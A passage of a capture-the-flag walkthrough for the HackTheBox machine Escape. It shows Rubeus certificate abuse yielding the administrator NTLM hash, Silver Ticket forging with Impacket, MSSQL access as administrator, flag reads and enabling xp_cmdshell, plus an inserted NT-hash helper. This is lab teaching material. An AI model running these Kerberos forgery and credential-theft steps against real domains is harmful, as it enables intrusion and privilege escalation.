Upload cert.pfx and Rubeus.exe (Rubeus also comes from SharpCollection), then run the asktgt command, passing it the certificate to get a TGT as administrator:

*Evil-WinRM* PS C:\programdata> upload cert.pfx

Info: Uploading /root/hackthebox/machine/escape/cert.pfx to C:\programdata\cert.pfx

Data: 4564 bytes of 4564 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> upload Rubeus.exe

Info: Uploading /root/hackthebox/machine/escape/Rubeus.exe to C:\programdata\Rubeus.exe

Data: 563200 bytes of 563200 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.0.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):


ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 6/19/2023 7:08:43 AM
EndTime : 6/19/2023 5:08:43 PM
RenewTill : 6/26/2023 7:08:43 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : NGN8YkXjv+npWzE3glTOrg==
ASREP (key) : 15BE0183651E57504615199D79D431BA

Rubeus tries to load the returned ticket directly into the current session, so in theory, once it runs, it should be possible to enter administrator's folder and read the flag. That does not work from an Evil-WinRM session, though.

Instead, run the same command with /getcredentials /show /nowrap. This also dumps the account's password credential information:

*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.0.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

...[snip]...

ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 6/19/2023 7:10:32 AM
EndTime : 6/19/2023 5:10:32 PM
RenewTill : 6/26/2023 7:10:32 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : qsYHqNw7wdiSCV8wdcq3jQ==
ASREP (key) : 0A4A84695595EA2E6C8D156B44ABB6E5

[*] Getting credentials using U2U

CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE

The last line is the NTLM hash of the administrator account.

Silver Ticket

Background

Escape "unintended"

There is an attack path in Escape involving Silver Tickets. It was found during HTB testing, but the team and the box author decided to keep it, because there was no good way to fix it in this scenario, and the path was judged both harder to find and as difficult as the intended one.

Silver Tickets

Silver Ticket attacks are described in detail in How Attackers Use Kerberos Silver Tickets to Exploit Systems:

  • Silver Ticket Attack

Normally, when a user wants to authenticate to MSSQL, they request a Kerberos ticket for its Service Principal Name (SPN). The request goes to the Key Distribution Center (KDC), usually a domain controller, which looks up the account associated with that SPN, checks whether the requesting user should have access, and after a few rounds of communication returns a ticket for the user, encrypted with the service account's NTLM hash. When the user presents that ticket to the service, the service can decrypt it and use it as authentication.

In a Silver Ticket attack, all communication with the DC is skipped. The attacker forges the service ticket (also called a TGS) and encrypts it with the service account's NTLM hash.

Attack strategy on Escape

We have the NTLM hash of the sql_svc account. The MSSQL service has no SPN assigned (if it did, we could ask the DC for a service ticket encrypted with sql_svc's hash and then modify it). But the DC is not needed at all: Impacket tooling can forge a service ticket locally, encrypt it with sql_svc's NTLM hash, and use it to connect to MSSQL. This ticket will not work against any other service, but it allows impersonating any user on MSSQL.

Information gathering

Overview

To generate a silver ticket with ticketer.py, the following information is needed:

  • sql_svc's NTLM hash
  • the domain SID
  • the domain name
  • an SPN (it does not have to be a valid one)
  • the name of the user to impersonate

The domain name, sequel.htb, is already known.

NTLM Hash

sql_svc's password is known, but the NTLM hash is what's needed. Plenty of online tools compute it (e.g. NTLM Hash Generator).

It can also be done in Python with hashlib: the NTLM (NT) hash is the MD4 of the password encoded as UTF-16 little-endian:

>>> import hashlib
>>> hashlib.new('md4', 'REGGIE1234ronnie'.encode('utf-16le')).digest()
b'\x14C\xec\x19\xdaM\xacO\xfc\x95;\xca\x1bW\xb4\xcf'

Print it with hex():

>>> hashlib.new('md4', 'REGGIE1234ronnie'.encode('utf-16le')).digest().hex()
'1443ec19da4dac4ffc953bca1b57b4cf'
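The same computation as a reusable function, as an added example (my code, not from the write-up). On systems built against OpenSSL 3 the hashlib.new('md4') call above fails with "unsupported hash type", because MD4 is only in the legacy provider, so the block falls back to a pure-Python MD4 in that case; matches_nt_hash is the form a defender uses to test a stored NT hash against a list of known-weak passwords.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4_pure(data):
    """Pure-Python MD4 (RFC 1320), used when OpenSSL's legacy provider is not loaded."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)       # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        # (mixing function, additive constant, message-word order, shift amounts)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = h[:]
        for fn, k, order, shifts in rounds:
            for i in range(16):
                j = (-i) % 4                        # registers update in the order a, d, c, b
                t = v[j] + fn(v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4]) + x[order[i]] + k
                v[j] = _lrot(t & MASK, shifts[i % 4])
        h = [(a + b) & MASK for a, b in zip(h, v)]
    return struct.pack("<4I", *h)


def md4(data):
    """MD4 via hashlib when the platform still offers it, otherwise the pure-Python version."""
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:                              # "unsupported hash type md4" on OpenSSL 3
        return md4_pure(data)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); the 'NTLM hash' ticketer.py and friends take."""
    return md4(password.encode("utf-16le")).hex()


def matches_nt_hash(password, expected_hex):
    """Check a candidate password against a stored NT hash, e.g. in a password audit."""
    return nt_hash(password) == expected_hex.lower()


if __name__ == "__main__":
    print(nt_hash("REGGIE1234ronnie"))             # 1443ec19da4dac4ffc953bca1b57b4cf
    print(matches_nt_hash("REGGIE1234ronnie", "1443EC19DA4DAC4FFC953BCA1B57B4CF"))
```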

Domain SID

Get-ADDomain returns information about the domain, including its SID:

*Evil-WinRM* PS C:\programdata> Get-ADDomain | fl DomainSID
DomainSID : S-1-5-21-4078382237-1492182817-2568127209

Silver Ticket

Generation

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn doesnotmatter/dc.sequel.htb administrator
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache

It builds the ticket and PAC and saves the TGS in administrator.ccache. The KRB5CCNAME environment variable tells Impacket (and other Kerberos clients) to authenticate with that ticket, either by running export KRB5CCNAME=administrator.ccache once, or by prefixing each command with KRB5CCNAME=administrator.ccache (the latter is used below to make it obvious where the ticket is in play).

Connect

With the ticket, authenticate to MSSQL as administrator. Kerberos rejects tickets when the client and server clocks differ by more than the permitted skew (five minutes by default), so sync the clock against the DC first:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ntpdate -u dc.sequel.htb 1 ⨯
2023-06-19 12:35:11.302698 (-0400) +1.961441 +/- 0.163425 dc.sequel.htb 10.10.11.202 s1 no-leap
CLOCK: time stepped by 1.961441

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# KRB5CCNAME=administrator.ccache mssqlclient.py -k dc.sequel.htb
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>

Read the flags

From here, OPENROWSET(BULK ...) reads files from the box as administrator:

SQL> SELECT * FROM OPENROWSET(BULK N'C:\users\ryan.cooper\desktop\user.txt', SINGLE_CLOB) AS Contents
BulkColumn
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
b'47e8a7ffa5ff5b79ea0eeb5906ec2a46\r\n'

SQL> SELECT * FROM OPENROWSET(BULK N'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) AS Contents
BulkColumn
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
b'427e2e823cf867a7a25b8f6d9943be9b\r\n'

Command execution

xp_cmdshell is still disabled, but unlike sql_svc, the administrator login has the rights to enable it:

SQL> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL> EXECUTE sp_configure 'show advanced options', 1
[*] INFO(DC\SQLMOCK): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> EXECUTE sp_configure 'xp_cmdshell', 1
[*] INFO(DC\SQLMOCK): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
sequel\sql_svc
NULL

The commands still run as sql_svc: the MSSQL service process itself runs under that account, and the ticket only lets the session impersonate administrator when SQL Server asks the OS for access to a file on the session's behalf, as OPENROWSET(BULK ...) does. It does not change the identity of processes that xp_cmdshell spawns.

File read and write as administrator can still be turned into execution as administrator. This PayloadsAllTheThings page collects several methods. The DiagHub method was shown in HackBack, though it has since been patched; the WerTrigger method, shown in Proper, still works.

Reference Sources

  • 0xdf’s blog Escape walkthrough
  • HTB’s official Escape walkthrough
  • Responder
  • SharpCollection
  • Certify
  • Investigating Certificate Template Enrollment Attacks – (ADCS)
  • certipy
  • Silver Ticket Attack
  • How Attackers Use Kerberos Silver Tickets to Exploit Systems